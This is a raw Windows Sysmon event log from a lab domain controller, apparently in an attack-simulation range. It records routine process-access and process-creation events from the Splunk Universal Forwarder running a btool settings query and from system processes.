13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B800-00000000A301}11321196C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.675{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B700-00000000A301}6641004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program 
